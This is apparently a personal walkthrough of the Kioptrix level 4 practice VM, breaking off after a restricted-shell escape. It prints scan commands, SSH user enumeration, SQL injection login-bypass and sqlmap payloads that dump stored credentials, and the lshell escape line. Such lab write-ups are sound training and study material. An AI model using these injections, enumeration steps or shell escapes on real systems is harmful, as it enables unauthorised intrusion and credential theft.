Contents

Booted VM

Information Gathering

$ nmap 10.10.10.0/24 -nP
...
Nmap scan report for 10.10.10.7
Host is up (0.00050s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27:3E:67:40 (Oracle VirtualBox virtual NIC)
$ sudo nikto --host 10.10.10.7
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.7
+ Target Hostname:    10.10.10.7
+ Target Port:        80
+ Start Time:         2020-07-19 18:10:19 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ Server may leak inodes via ETags, header found with file /icons/README, inode: 98933, size: 5108, mtime: Tue Aug 28 06:48:10 2007
+ OSVDB-3233: /icons/README: Apache default file found.
+ Cookie PHPSESSID created without the httponly flag
+ 8672 requests: 0 error(s) and 19 item(s) reported on remote host
+ End Time:           2020-07-19 18:10:42 (GMT-4) (23 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

$ msfconsole
msf5 > use auxiliary/scanner/smb/smb_version
msf5 auxiliary(scanner/smb/smb_version) > show options
msf5 auxiliary(scanner/smb/smb_version) > set RHOSTS 10.10.10.7
RHOSTS => 10.10.10.7
msf5 auxiliary(scanner/smb/smb_version) > set THREADS 11
THREADS => 11
msf5 auxiliary(scanner/smb/smb_version) > run

[*] 10.10.10.7:445        - Host could not be identified: Unix (Samba 3.0.28a)
[*] 10.10.10.7:445        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5> exit
$ searchsploit 3.0.28a samba
-------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                          |  Path
-------------------------------------------------------------------------------------------------------- ---------------------------------
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass                                                  | multiple/remote/10095.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC)                                                           | linux_x86/dos/36741.py
-------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
$ cat /usr/share/exploitdb/exploits/multiple/remote/10095.txt
The following proof of concept is available:

smb: \> put aa%3Fbb
# The server doesn't allow 
$ smbclient -L 10.10.10.7
protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED
# Added 'client min protocol = NT1' under Global section of /etc/samba/smb.conf
$ smbclient -L 10.10.10.7 
Enter WORKGROUP\kali's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        IPC$            IPC       IPC Service (Kioptrix4 server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            KIOPTRIX4

Alright, no immediate wins there!

Inspecting the Webapp

The index of the webapp presents us with a login page:

Webapp index

I went straight into testing for SQL injection, the first thing I tried got me:
Webapp
Here, you can keep changing the username URL parameter and seemingly attempt to load other users? Also of note, it’s vulnerable to very simple XSS in the URL parameter:
Webapp
I think if we can figure out one of the usernames on the server, we may be able to get their page?

$ sudo finger @10.10.10.7
[sudo] password for kali: 
finger: connect: Connection refused
[email protected]:~/Desktop$ sudo finger [email protected]
finger: connect: Connection refused
$ msfconsole
msf5> use auxiliary/scanner/ssh/ssh_enumusers
> set USER_FILE /usr/share/metasploit-framework/data/wordlists/namelist.txt
... A bunch of standard unix accounts
[+] 10.10.10.7:22 - SSH - User 'robert' found
[+] 10.10.10.7:22 - SSH - User 'john' found

Robert seems like a viable account name, let’s try getting in there! I went through the same process as before:
- Username= robert
- Password= `1’ or ‘1’=‘1
Webapp
Well that doesn’t seem overly useful, the page source is also pretty uninteresting.

Backing up a little bit, we don’t get an error from mucking about with the username field, but in the password field we can quite easily get:
Webapp

So I assume the PHP code looks something like this:

<?php

 $query = "SELECT *     
         FROM users 
         WHERE username=$_POST['myusername']
         AND password=$_POST['mypassword']
         ";

 $result = @mysql_query ($query); 

 if (mysql_num_rows($result) == 1) { 
     // Do something with the result
}

Our best bet here, due to the restriction on results of the query, is probably to try and inject PHP commands. So, let’s focus on that for a while:

$query = "SELECT *     
        FROM users 
        WHERE username='username value, seems sanitized'
        AND password='password value, seems to not be  sanitized, but cannot execute mysql commands'
        ";
  • adding -- to the query had no affect, which lines up
  • Adding # to the query had no affect, which lines up

So, if we tried '"echo('helllo world');\ we may get code execution? No dice. Well, let’s just try sqlmap shall we? We already know we’re working with MySQL

$ sudo sqlmap -u "http://10.10.10.7/checklogin.php" --dbms=MySQL --level=5 --risk=3 --data="myusername=admin&mypassword=test" --dump
[sudo] password for kali: 
        ___
       __H__                                                                                                                              
 ___ ___[']_____ ___ ___  {1.4.6#stable}                                                                                                  
|_ -| . ["]     | .'| . |                                                                                                                 
|___|_  [.]_|_|_|__,|  _|                                                                                                                 
      |_|V...       |_|   http://sqlmap.org                                                                                               

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 22:48:26 /2020-07-19/

[22:48:26] [INFO] testing connection to the target URL
[22:48:26] [INFO] checking if the target is protected by some kind of WAF/IPS
[22:48:26] [INFO] testing if the target URL content is stable
[22:48:27] [INFO] target URL content is stable
[22:48:27] [INFO] testing if POST parameter 'myusername' is dynamic
[22:48:27] [WARNING] POST parameter 'myusername' does not appear to be dynamic
[22:48:27] [WARNING] heuristic (basic) test shows that POST parameter 'myusername' might not be injectable
[22:48:27] [INFO] testing for SQL injection on POST parameter 'myusername'
[22:48:27] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:48:27] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[22:48:28] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT)'
[22:48:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[22:48:28] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[22:48:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[22:48:28] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (comment)'
[22:48:29] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - comment)'
[22:48:29] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[22:48:29] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
[22:48:29] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL - original value)'
[22:48:29] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
[22:48:29] [INFO] testing 'Boolean-based blind - Parameter replace (CASE - original value)'
[22:48:29] [INFO] testing 'HAVING boolean-based blind - WHERE, GROUP BY clause'
[22:48:29] [INFO] testing 'Generic inline queries'
[22:48:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[22:48:29] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[22:48:29] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[22:48:29] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[22:48:29] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[22:48:30] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[22:48:30] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[22:48:30] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[22:48:30] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[22:48:31] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[22:48:31] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
[22:48:31] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[22:48:31] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[22:48:31] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[22:48:31] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
[22:48:31] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[22:48:31] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[22:48:31] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[22:48:31] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[22:48:31] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[22:48:31] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[22:48:31] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[22:48:31] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[22:48:31] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[22:48:32] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[22:48:32] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[22:48:32] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[22:48:32] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[22:48:33] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[22:48:33] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[22:48:33] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[22:48:33] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[22:48:34] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[22:48:34] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[22:48:34] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[22:48:34] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[22:48:35] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[22:48:35] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[22:48:35] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[22:48:35] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[22:48:35] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[22:48:35] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[22:48:35] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[22:48:35] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[22:48:35] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[22:48:35] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
[22:48:35] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
[22:48:35] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[22:48:35] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[22:48:35] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[22:48:35] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[22:48:35] [INFO] testing 'MySQL inline queries'
[22:48:35] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[22:48:35] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[22:48:35] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[22:48:35] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[22:48:36] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[22:48:36] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[22:48:36] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[22:48:36] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[22:48:36] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[22:48:37] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[22:48:37] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[22:48:37] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'
[22:48:37] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[22:48:37] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[22:48:37] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[22:48:38] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query)'
[22:48:38] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query - comment)'
[22:48:38] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query - comment)'
[22:48:38] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[22:48:38] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[22:48:39] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[22:48:39] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[22:48:39] [INFO] testing 'MySQL AND time-based blind (ELT)'
[22:48:39] [INFO] testing 'MySQL OR time-based blind (ELT)'
[22:48:39] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[22:48:40] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[22:48:40] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[22:48:40] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[22:48:40] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[22:48:40] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[22:48:40] [INFO] testing 'MySQL < 5.0.12 time-based blind - Parameter replace (heavy queries)'
[22:48:40] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
[22:48:40] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[22:48:40] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[22:48:40] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[22:48:40] [INFO] testing 'MySQL < 5.0.12 time-based blind - ORDER BY, GROUP BY clause (heavy query)'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] n
[22:49:24] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[22:49:26] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[22:49:27] [INFO] testing 'Generic UNION query (NULL) - 11 to 20 columns'
[22:49:29] [INFO] testing 'Generic UNION query (random number) - 11 to 20 columns'
[22:49:30] [INFO] testing 'Generic UNION query (NULL) - 21 to 30 columns'
[22:49:32] [INFO] testing 'Generic UNION query (random number) - 21 to 30 columns'
[22:49:34] [INFO] testing 'Generic UNION query (NULL) - 31 to 40 columns'
[22:49:35] [INFO] testing 'Generic UNION query (random number) - 31 to 40 columns'
[22:49:37] [INFO] testing 'Generic UNION query (NULL) - 41 to 50 columns'
[22:49:38] [INFO] testing 'Generic UNION query (random number) - 41 to 50 columns'
[22:49:40] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[22:49:41] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[22:49:43] [INFO] testing 'MySQL UNION query (NULL) - 11 to 20 columns'
[22:49:44] [INFO] testing 'MySQL UNION query (random number) - 11 to 20 columns'
[22:49:46] [INFO] testing 'MySQL UNION query (NULL) - 21 to 30 columns'
[22:49:48] [INFO] testing 'MySQL UNION query (random number) - 21 to 30 columns'
[22:49:49] [INFO] testing 'MySQL UNION query (NULL) - 31 to 40 columns'
[22:49:51] [INFO] testing 'MySQL UNION query (random number) - 31 to 40 columns'
[22:49:52] [INFO] testing 'MySQL UNION query (NULL) - 41 to 50 columns'
[22:49:53] [INFO] testing 'MySQL UNION query (random number) - 41 to 50 columns'
[22:49:55] [WARNING] POST parameter 'myusername' does not seem to be injectable
[22:49:55] [INFO] testing if POST parameter 'mypassword' is dynamic
[22:49:55] [WARNING] POST parameter 'mypassword' does not appear to be dynamic
[22:49:55] [INFO] heuristic (basic) test shows that POST parameter 'mypassword' might be injectable (possible DBMS: 'MySQL')
[22:49:55] [INFO] testing for SQL injection on POST parameter 'mypassword'
[22:49:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:49:55] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
got a 302 redirect to 'http://10.10.10.7:80/login_success.php?username=admin'. Do you want to follow? [Y/n] n
[22:50:03] [INFO] POST parameter 'mypassword' appears to be 'OR boolean-based blind - WHERE or HAVING clause' injectable (with --code=302)
[22:50:03] [INFO] testing 'Generic inline queries'
[22:50:03] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[22:50:03] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[22:50:03] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[22:50:03] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[22:50:03] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[22:50:03] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[22:50:03] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[22:50:03] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[22:50:03] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[22:50:03] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[22:50:03] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[22:50:03] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[22:50:03] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[22:50:03] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[22:50:03] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[22:50:03] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[22:50:03] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[22:50:03] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[22:50:03] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[22:50:03] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[22:50:03] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[22:50:03] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[22:50:03] [INFO] testing 'MySQL inline queries'
[22:50:03] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[22:50:03] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[22:50:03] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[22:50:03] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[22:50:03] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[22:50:03] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[22:50:03] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[22:50:13] [INFO] POST parameter 'mypassword' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[22:50:13] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[22:50:13] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[22:50:13] [INFO] target URL appears to be UNION injectable with 3 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[22:50:48] [INFO] testing 'Generic UNION query (67) - 21 to 40 columns'
[22:50:48] [INFO] testing 'Generic UNION query (67) - 41 to 60 columns'
[22:50:48] [INFO] testing 'Generic UNION query (67) - 61 to 80 columns'
[22:50:48] [INFO] testing 'Generic UNION query (67) - 81 to 100 columns'
[22:50:48] [INFO] testing 'MySQL UNION query (67) - 1 to 20 columns'
[22:50:48] [INFO] testing 'MySQL UNION query (67) - 21 to 40 columns'
[22:50:48] [INFO] testing 'MySQL UNION query (67) - 41 to 60 columns'
[22:50:49] [INFO] testing 'MySQL UNION query (67) - 61 to 80 columns'
[22:50:49] [INFO] testing 'MySQL UNION query (67) - 81 to 100 columns'
[22:50:49] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
[22:50:49] [INFO] checking if the injection point on POST parameter 'mypassword' is a false positive
POST parameter 'mypassword' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 10638 HTTP(s) requests:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: myusername=admin&mypassword=-3214' OR 1085=1085-- IewH

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: myusername=admin&mypassword=test' AND (SELECT 6493 FROM (SELECT(SLEEP(5)))drBO)-- Bnbe
---
[22:50:59] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[22:50:59] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[22:50:59] [INFO] fetching current database
[22:50:59] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[22:50:59] [INFO] retrieved: members
[22:50:59] [INFO] fetching tables for database: 'members'
[22:50:59] [INFO] fetching number of tables for database 'members'
[22:50:59] [INFO] retrieved: 1
[22:50:59] [INFO] retrieved: members
[22:51:00] [INFO] fetching columns for table 'members' in database 'members'
[22:51:00] [INFO] retrieved: 3
[22:51:00] [INFO] retrieved: id
[22:51:00] [INFO] retrieved: username
[22:51:01] [INFO] retrieved: password
[22:51:01] [INFO] fetching entries for table 'members' in database 'members'
[22:51:01] [INFO] fetching number of entries for table 'members' in database 'members'
[22:51:01] [INFO] retrieved: 2
[22:51:01] [INFO] retrieved: 1
[22:51:01] [INFO] retrieved: MyNameIsJohn
[22:51:02] [INFO] retrieved: john
[22:51:03] [INFO] retrieved: 2
[22:51:03] [INFO] retrieved: ADGAdsafdfwt4gadfga==
[22:51:04] [INFO] retrieved: robert
Database: members
Table: members
[2 entries]
+------+----------+-----------------------+
| id   | username | password              |
+------+----------+-----------------------+
| 1    | john     | MyNameIsJohn          |
| 2    | robert   | ADGAdsafdfwt4gadfga== |
+------+----------+-----------------------+

[22:51:05] [INFO] table 'members.members' dumped to CSV file '/root/.local/share/sqlmap/output/10.10.10.7/dump/members/members.csv'
[22:51:05] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/10.10.10.7'

[*] ending @ 22:51:05 /2020-07-19/

Hell yes! Well, let’s login as john first:

$ ssh [email protected]
The authenticity of host '10.10.10.7 (10.10.10.7)' cant be established.
RSA key fingerprint is SHA256:3fqlLtTAindnY7CGwxoXJ9M2rQF6nn35SFMTVv56lww.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.7' (RSA) to the list of known hosts.
[email protected] password: 
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  dont screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ ls -al
total 28
drwxr-xr-x 2 john john 4096 2012-02-04 18:39 .
drwxr-xr-x 5 root root 4096 2012-02-04 18:05 ..
-rw------- 1 john john   61 2012-02-04 23:31 .bash_history
-rw-r--r-- 1 john john  220 2012-02-04 18:04 .bash_logout
-rw-r--r-- 1 john john 2940 2012-02-04 18:04 .bashrc
-rw-r--r-- 1 john john  118 2012-02-04 23:31 .lhistory
-rw-r--r-- 1 john john  586 2012-02-04 18:04 .profile
john:~$ sudo -l
*** forbidden sudo -> sudo -l
john:~$ sudo -L
*** forbidden sudo -> sudo -L
john:~$ ls /
*** forbidden path -> "/"
*** You have 0 warning(s) left, before getting kicked out.
This incident has been reported.
john:~$ ls/
*** unknown command: ls/
john:~$ ls /
*** forbidden path -> "/"
*** Kicked out
Connection to 10.10.10.7 closed.
[email protected]:~/Desktop$ ssh [email protected]
[email protected] password: 
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  dont screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ ls  -al
total 28
drwxr-xr-x 2 john john 4096 2012-02-04 18:39 .
drwxr-xr-x 5 root root 4096 2012-02-04 18:05 ..
-rw------- 1 john john   61 2012-02-04 23:31 .bash_history
-rw-r--r-- 1 john john  220 2012-02-04 18:04 .bash_logout
-rw-r--r-- 1 john john 2940 2012-02-04 18:04 .bashrc
-rw-r--r-- 1 john john  155 2020-07-19 22:53 .lhistory
-rw-r--r-- 1 john john  586 2012-02-04 18:04 .profile
john:~$ cd/ 
*** unknown command: cd/
john:~$ cd /
*** forbidden path -> "/"
*** You have 0 warning(s) left, before getting kicked out.
This incident has been reported.
john:~$ ls /tmp
*** forbidden path -> "/tmp/"
*** Kicked out
Connection to 10.10.10.7 closed.

Lol, gotta love it. Well, let’s try robert… The password isn’t base64 and It’s not recognized on the few hash sites I tried. Perhaps it’ll be easier to escape the shell we we’re locked in on johns account.

Hilariously, I looked up shell escape cheatsheet, and the first thing I tried worked:

$ ssh [email protected]
[email protected]'s password: 
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ echo os.system('/bin/bash')
[email protected]:~$ id
uid=1001(john) gid=1001(john) groups=1001(john)

Now we should be able to poke around:

[email protected]:~$ sudo  -l
[sudo] password for john: 
